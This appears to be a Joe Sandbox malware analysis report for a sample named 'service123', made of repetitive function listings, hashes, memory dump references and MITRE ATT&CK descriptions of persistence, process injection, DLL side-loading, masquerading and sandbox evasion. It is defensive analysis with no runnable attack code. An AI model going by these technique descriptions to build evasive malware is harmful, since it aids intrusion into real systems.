Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: aab5063f118816f5fed1db89fb86bbd3853351de9a46cda747d5df2d2d7c6e2f
Instruction ID: 0a93576781c87e4cca937fa6bc49ccf5f225de45da43aa7104ec9878664f9f14
Opcode Fuzzy Hash: aab5063f118816f5fed1db89fb86bbd3853351de9a46cda747d5df2d2d7c6e2f
Instruction Fuzzy Hash: 92F17CB4A01606CFC700DFACC1849AEBBF0FF48314B558A18D895DB750EB34E985CB81

Function 001C29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001C2A31

Strings

NaN, xrefs: 001C29B1

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: f827724a0a58aaf36a056b19e2fa1b721a180dcaeeaae8185f5621f0fa9c2495
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: B4410871A04215CBDB24DF19C4C4B56B7E1AFA8714F2982ADDC899F64AD732DC42CB90

Function 6C9D3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9D3101

Strings

NaN, xrefs: 6C9D3081

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: f4dae69983d86b37979583a5bc4b710a2a38d0d5cbb377ebbf45af9f3c74e8a5
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 30411CB1A05A16CBC710CF29C480795B7F5BF85705B2AC299DC48AF74AD332ED46CB90

Function 6CA54DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA54E0A
strlen.MSVCRT ref: 6CA54E8D
strlen.MSVCRT ref: 6CA54F10
strlen.MSVCRT ref: 6CA54F93

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 4be9b9824a900077f49ea6d4ab39ac87e0fbea9a79df885080528ec65acc1ab9
Instruction ID: 62d61d1d1b97eabee92e8c416ffe89bd29557fa533994e908db721b4f45f8b5e
Opcode Fuzzy Hash: 4be9b9824a900077f49ea6d4ab39ac87e0fbea9a79df885080528ec65acc1ab9
Instruction Fuzzy Hash: 87E16970A056058FCB00DFACC1C49AEBBF1BF49314B548669E855CBB54EB34E99ACB81

Function 6CA545D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA5460A
strlen.MSVCRT ref: 6CA5468D
strlen.MSVCRT ref: 6CA54710
strlen.MSVCRT ref: 6CA54793

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 787ae405e9c01d0b8426968dddfef205c8147c76dd772c83937d46a35e3a3730
Instruction ID: 22a95813d8ed37f553c6b28320f784b86b961f6df7b3cacb65bf5cbbf6bab6ab
Opcode Fuzzy Hash: 787ae405e9c01d0b8426968dddfef205c8147c76dd772c83937d46a35e3a3730
Instruction Fuzzy Hash: 99E16974A056058FC700DFACC1C49AEBBF1BF49314B548669D895CBB54EB34E89ACF81

Function 6C9DE1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C9DE1FE
strlen.MSVCRT ref: 6C9DE211

Strings

basic_string: construction from null is not valid, xrefs: 6C9DE233

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 7ede42540fd7a584335bed3e98154d6b7b9f8d43fc81b2ff7ba87fb2da7cedfd
Instruction ID: 2dc3599a7c15641198d95689dd66fe9b5f4fb44a45c3fe70273d78eefeeb1cae
Opcode Fuzzy Hash: 7ede42540fd7a584335bed3e98154d6b7b9f8d43fc81b2ff7ba87fb2da7cedfd
Instruction Fuzzy Hash: 23118472A046408FC744FF7DC84144AB7F5AB9A214F45CA6DE84997705E634D8098FE3

Function 001C2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001C2E97
fputc.MSVCRT ref: 001C2F07
memset.MSVCRT ref: 001C2FC2

Strings

o, xrefs: 001C2F5E

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: c22a991e83d86ccf857159107e9b090df0da6d7daafa4e9d95ed1ad8c78a7162
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 7B313A71A04209CFCB14CF68C194BA9BBF1BF68350F15861DE98AAB705E734E940CB94

Function 6C9D3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9D3567
fputc.MSVCRT ref: 6C9D35D7
memset.MSVCRT ref: 6C9D3692

Strings

o, xrefs: 6C9D362E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: bc4936c1bc4613d00f71ea40d12c6c02e76700caa8dd044d09952a5517676623
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: C4311672A18A058FCB00CF78C1807A9BBF5BB49355F168659E989BBB01E734F905CB40

Function 001C3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001C338F
fputc.MSVCRT ref: 001C33F1

Strings

@, xrefs: 001C342A

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 7ea01515702e146c1cc28c240ace04b71724b8eb0bb342d2db2cdb21da2abc8e
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 6B113AB1A042408BCB19CF28C184BA97BF1BF65304F25D55CEDA99F24ADB34ED00CB54

Function 6C9D3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9D3A5F
fputc.MSVCRT ref: 6C9D3AC1

Strings

@, xrefs: 6C9D3AFA

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 4227714ae35d8a6dfba9111a9b3c6ef8040db1f880531ca82a3ac49d6a03d0fb
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: 5B11E7B2A05A108BCB00DF68C1807997BB5BB45306F66D699ED997FA4AD334F801CB44

Function 001C18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 001C191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 001C18FF
Unknown error, xrefs: 001C18B2

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: e51fcb20def49c841711317396119aa160050ca2ffdc1077f16960e2e13b4b5e
Instruction ID: b7bb5ebfd081e0de635d8dcdf08fd456af503b9db01cd23de4f42ab8aa1cd290
Opcode Fuzzy Hash: e51fcb20def49c841711317396119aa160050ca2ffdc1077f16960e2e13b4b5e
Instruction Fuzzy Hash: D501C070408B45DBD300AF15E58891ABFF1FF9A354F86889CE5C846269CB32D8A8CB42

Function 6C9E77B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9E77D3

Part of subcall function 6CA34050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C9E77E6), ref: 6CA340B3

strlen.MSVCRT ref: 6C9E7844
strlen.MSVCRT ref: 6C9E78B2
strlen.MSVCRT ref: 6C9E7926

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: d5d293a0e010f76cf31c071952d485834e32975dc3d70af4c9d0aa1769d56267
Instruction ID: 1b3218c4ef40232459db5210dabb9c27a0b779913c1a075c6e36438e066b37c2
Opcode Fuzzy Hash: d5d293a0e010f76cf31c071952d485834e32975dc3d70af4c9d0aa1769d56267
Instruction Fuzzy Hash: 205134B4A05A118FCB01EF28C1A865DFBF5BF99304F0185ADD8959F721CB35E849CB82

Function 001C6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,001C6C81,?,?,?,?,?,?,00000000,001C4F24), ref: 001C6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,001C6C81,?,?,?,?,?,?,00000000,001C4F24), ref: 001C6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,001C6C81,?,?,?,?,?,?,00000000,001C4F24), ref: 001C6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,001C6C81,?,?,?,?,?,?,00000000,001C4F24), ref: 001C6BF8

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 1384ae0d0437dae92fa9f8b2f54901668bf7e49868765facb6a88b9cc7c8e0f6
Instruction ID: 90e5d33f2afcfd4f3ef19c5ca7ae78dc2c952a53fd6c4ce0837da8b86d9cbf04
Opcode Fuzzy Hash: 1384ae0d0437dae92fa9f8b2f54901668bf7e49868765facb6a88b9cc7c8e0f6
Instruction Fuzzy Hash: E5112DB16181408ADB24BB3CB9C6F6ABBE4EB21300F15093DD486C7A15EB75ECD4C796

Function 6C9D8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C9D81A1), ref: 6C9D80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C9D81A1), ref: 6C9D80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C9D81A1), ref: 6C9D80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C9D81A1), ref: 6C9D8118

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 48b5de22038446fcdd28cc7c9c2f29b76bacd0d344501c9c4a138c327ddae5fb
Instruction ID: 498687365c8500d8aba87ed32bcf4f70ee63aa5a11884c5a0e5b6181fe4b7d45
Opcode Fuzzy Hash: 48b5de22038446fcdd28cc7c9c2f29b76bacd0d344501c9c4a138c327ddae5fb
Instruction Fuzzy Hash: 8D11A5B16057028BDF48BB7CE5C629A77B8EB0A314F539926C442D3602E631F889D7D7

Function 001C2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,001C21D3,?,?,?,?,?,001C17E8), ref: 001C200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,001C21D3,?,?,?,?,?,001C17E8), ref: 001C2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,001C21D3,?,?,?,?,?,001C17E8), ref: 001C203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,001C21D3,?,?,?,?,?,001C17E8), ref: 001C205C

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 2cdec8793073f1cc6b0df8ac73958767b43ef38e3af1c1ecd0d360971ee4654c
Instruction ID: 5933f618e129c105a4032c0584bc936353b6ef243ef041bea23f6e7e3cba94b6
Opcode Fuzzy Hash: 2cdec8793073f1cc6b0df8ac73958767b43ef38e3af1c1ecd0d360971ee4654c
Instruction Fuzzy Hash: E9F081755003008FDB107F78A984E1A7FA4EB14740B09443DED4457214D730E866CBA6

Function 6C9CAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C9CAB5E
TlsGetValue.KERNEL32 ref: 6C9CAB85
GetLastError.KERNEL32 ref: 6C9CAB8C
LeaveCriticalSection.KERNEL32 ref: 6C9CABAC

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 82aedc13e90d2bf222becec88ebb2a1d2bff5781372389829720fe6475b46d55
Instruction ID: a5f3158e4bbe4b2bc07d75d3701a694562992aa931c1f5485839516da5629f0d
Opcode Fuzzy Hash: 82aedc13e90d2bf222becec88ebb2a1d2bff5781372389829720fe6475b46d55
Instruction Fuzzy Hash: 76F0A4B2B003028FDF00BFB9D5C599A7B78EA59264F054178ED4487705EA30E94ACBE3

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

